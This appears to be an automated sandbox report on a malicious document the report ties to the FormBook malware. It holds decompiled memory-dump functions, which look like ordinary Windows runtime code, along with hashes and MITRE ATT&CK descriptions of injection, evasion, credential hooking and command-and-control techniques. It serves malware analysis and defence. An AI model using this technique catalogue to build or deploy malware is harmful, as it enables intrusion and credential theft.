0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623cb
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00a6228f
0x00000000
0x00a6226d
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00a253d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
RTL: Re-Waiting, xrefs: 00A62328
RTL: Resource at %p, xrefs: 00A6230B

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00A2EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A1DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xae793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A016C0(_t39);
				} else {
					_t40 = E009FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A43915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xae793c; // 0x0
								_push(_t85);
								_t44 = E00A01F28(_t71);
							} else {
								_t44 = E009FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A43915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00A82306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A2EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A44FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A53F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A53F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xae20c0;
								if(_t85 != 0xae20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00A8217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A53F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00a2ec56
0x00a2ec56
0x00a2ec56
0x00a2ec5c
0x00a2ec64
0x00a623e6
0x00a623eb
0x00a623eb
0x00a2ec6a
0x00a2ec6c
0x00a2ec6f
0x00a623f3
0x00a623f8
0x00a623fa
0x00a623fc
0x00a2ec75
0x00a2ec76
0x00a2ec76
0x00a2ec7b
0x00a2ec7c
0x00a2ec7e
0x00a62406
0x00a62407
0x00a6240c
0x00a6240d
0x00a6240d
0x00a6240d
0x00a62414
0x00a62417
0x00a6241e
0x00a62435
0x00a62438
0x00a6243c
0x00a6243f
0x00a62442
0x00a62443
0x00a62446
0x00a62449
0x00a62453
0x00a62455
0x00a6245b
0x00a6245b
0x00a2eb99
0x00a2eb99
0x00a2eb9c
0x00a2eb9d
0x00a2eb9f
0x00a2eba2
0x00a62465
0x00a6246b
0x00a6246d
0x00a2eba8
0x00a2eba9
0x00a2eba9
0x00a2ebae
0x00a2ebb3
0x00a2ebb9
0x00a2ebbb
0x00a62513
0x00a62514
0x00a62519
0x00a6251b
0x00a2ec2a
0x00a2ec2d
0x00a2ec33
0x00a2ec36
0x00a2ec3a
0x00a2ec3e
0x00a2ec40
0x00a2ec47
0x00a2ec47
0x00a2ec40
0x00a022c6
0x00a2ebc1
0x00a2ebc1
0x00a2ebc5
0x00a2ec9a
0x00a2ec9a
0x00a2ebd6
0x00a2ebd6
0x00000000
0x00a2ebbb
0x00a62477
0x00a6247c
0x00a62486
0x00a6248b
0x00a62496
0x00a6249b
0x00a6249d
0x00a624a0
0x00a624a3
0x00a624aa
0x00a624aa
0x00a624a5
0x00a624a5
0x00a624a5
0x00a624ac
0x00a624af
0x00a624b0
0x00a624b3
0x00a624b9
0x00a624ba
0x00a624bb
0x00a624c6
0x00a624cb
0x00a624cd
0x00a624d0
0x00a624d1
0x00a624d4
0x00a624d6
0x00a624d9
0x00a624d9
0x00a624dc
0x00a624df
0x00a624e1
0x00a624e7
0x00a624e9
0x00a624ec
0x00a624ef
0x00a624f2
0x00a624f2
0x00a624ef
0x00a624e7
0x00a624fa
0x00a624ff
0x00a62501
0x00a62503
0x00a62506
0x00a6250b
0x00a2eb8c
0x00a2eb93
0x00000000
0x00000000
0x00a2eb93
0x00000000
0x00a2eb99
0x00a2ec85
0x00a2ec85
0x00a2ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 00A624FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A624BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A6248D

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction ID: 6973d9136ecc8518d511a44da7530a1c3dfa326f96904a4fd3d274cb99bad66e
Opcode Fuzzy Hash: 122ef88332f2547379f73ea6e2f23b9c6e38580d0721dd097e8405610a630966
Instruction Fuzzy Hash: 44411871600604ABDB20DBA8DD89FAA77B8EF84720F208615F5559B2C1D734ED818760

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00A3EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00A3EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00A3685D(_t167, 4) == 0) {
								if(E00A3685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00A3685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00A3685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A18980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A0DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00A3EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00A3EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00a3fcd1
0x00a3fcd6
0x00a3fcd9
0x00a3fcdc
0x00a3fcdf
0x00a3fce2
0x00a3fce5
0x00a3fce8
0x00a3fceb
0x00a3fced
0x00a3fced
0x00a3fcf3
0x00000000
0x00000000
0x00a3fcfc
0x00a3fcfe
0x00a3fdc1
0x00a6ecbd
0x00000000
0x00a6eccc
0x00a6eccc
0x00a6ecd2
0x00000000
0x00000000
0x00a6ecdf
0x00a6ece0
0x00a6ece4
0x00a6eceb
0x00a6ecee
0x00a6eca8
0x00a6eca8
0x00a6ecaa
0x00a3fd76
0x00a3fd79
0x00a3fdb4
0x00a3fdb5
0x00a3fdb6
0x00000000
0x00a3fdb6
0x00a3fd7e
0x00a6ecfc
0x00a3fe2f
0x00000000
0x00a3fe2f
0x00a6ed08
0x00a6ed0f
0x00a6ed17
0x00a6ed1b
0x00000000
0x00a6ed1b
0x00a3fd88
0x00000000
0x00000000
0x00a3fd94
0x00a3fd99
0x00a3fda1
0x00000000
0x00000000
0x00a3fdb0
0x00000000
0x00a3fdb0
0x00a6ecbd
0x00a3fdc7
0x00a3fdcb
0x00000000
0x00a3fdd7
0x00a3fde3
0x00a3fe06
0x00a51fe7
0x00000000
0x00000000
0x00a51fef
0x00a51ff0
0x00a51ff4
0x00a51ff7
0x00a51ffa
0x00a51ffd
0x00a52000
0x00000000
0x00000000
0x00a6ecf1
0x00000000
0x00a6ecf1
0x00000000
0x00a3fe06
0x00a3fde8
0x00a3fdec
0x00a3fdef
0x00a3fdf2
0x00000000
0x00a3fdf2
0x00a3fdcb
0x00a3fd04
0x00a3fd05
0x00a6ec67
0x00000000
0x00000000
0x00a6ec6f
0x00000000
0x00a6ec6f
0x00a3fd13
0x00a3fd3c
0x00a3fd40
0x00a6ec75
0x00a6ec7a
0x00000000
0x00a6ec8a
0x00a6ec8a
0x00a6ec90
0x00a6ecb2
0x00a3fd73
0x00a3fd73
0x00000000
0x00a3fd73
0x00a6ec95
0x00000000
0x00000000
0x00a6eca1
0x00a6eca4
0x00a6eca5
0x00000000
0x00a6eca5
0x00a6ec7a
0x00a3fd4a
0x00000000
0x00a3fd6e
0x00a3fd6e
0x00a3fd71
0x00000000
0x00a3fd71
0x00a3fd4a
0x00a3fd21
0x00a4a3a1
0x00000000
0x00a4a3a1
0x00a3fd36
0x00a5200b
0x00a52012
0x00000000
0x00000000
0x00a52018
0x00000000
0x00a52018
0x00000000
0x00a3fd36
0x00a3fe0f
0x00a3fe16
0x00a4a3ad
0x00000000
0x00000000
0x00a4a3b3
0x00a4a3b3
0x00a3fe1f
0x00a6ed25
0x00a6ed86
0x00000000
0x00000000
0x00a6ed91
0x00a6ed95
0x00a6ed95
0x00a6ed9a
0x00a6edad
0x00a6edb3
0x00a6edba
0x00a6edc4
0x00a6edc9
0x00000000
0x00a6edcc
0x00a6ed2a
0x00a6ed55
0x00000000
0x00000000
0x00a6ed61
0x00a6ed66
0x00a6ed6e
0x00000000
0x00000000
0x00a6ed7d
0x00000000
0x00a6ed7d
0x00a6ed30
0x00000000
0x00000000
0x00a6ed3c
0x00a6ed43
0x00a6ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00A3FD94

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: ec7cf41994a5f1220f04a7fae334367f5fa7f8fa50bc84eae926909f4ab92885
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: E1919E75E1021AEFDF28DF99C845AAEB7B4FF55309F30807AE401A71A2E7305A45CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

